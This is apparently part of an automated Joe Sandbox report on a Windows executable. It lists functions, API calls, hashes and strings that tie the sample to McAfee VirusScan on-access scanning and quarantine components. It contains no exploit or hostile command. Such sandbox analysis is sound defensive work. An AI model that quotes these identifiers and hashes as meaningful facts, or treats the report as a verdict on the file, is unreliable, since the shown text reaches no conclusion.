                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                  • Instruction ID: 3ebcd1e3d86842839c1dba410951551620a7be1127b368d727b69c627f5226d5
                                  • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                  • Instruction Fuzzy Hash: 68F062B1B192958AEFA49F38E942E2A77D4E748380F988039D68D87B04D63C94608F04
                                  Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 365 140003a4b-140003a65 SetEvent ResetEvent 361->365 363 140003ab4-140003abe 362->363 364 140003a90-140003aad #4 362->364 366 140003ae8-140003af9 363->366 367 140003ac0-140003ae1 #4 363->367 364->363 365->362 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                  • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                  • API String ID: 1021822269-3147033232
                                  • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                  • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
                                  Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                  • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                  • API String ID: 883923345-381368982
                                  • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                  • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                  Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                  • String ID:
                                  • API String ID: 1613947383-0
                                  • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                  • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                  Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                  • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                  Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                  • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                  Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                  • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 93015348-1041928032
                                  • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                  • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                  Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                  • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                  • API String ID: 3682727354-300733478
                                  • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                  • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                  Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                  • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                  • API String ID: 2587151837-1427723692
                                  • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                  • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                  Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                  • String ID: SetDllDirectoryW$kernel32.dll
                                  • API String ID: 3184163350-3826188083
                                  • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                  • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                  Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3424473247-996641649
                                  • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                  • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                  Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1775797328-0
                                  • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                  • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                  Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                  • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 1232609184-0
                                  • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                  • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                  Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                  • String ID: H
                                  • API String ID: 2107338056-2852464175
                                  • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                  • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                  Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                  • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                  • API String ID: 1322048431-2685357988
                                  • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                  • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                  Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                  • API String ID: 2984211723-3002863673
                                  • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                  • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                  Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                  • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                  • API String ID: 678758403-4129911376
                                  • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                  • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                  Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
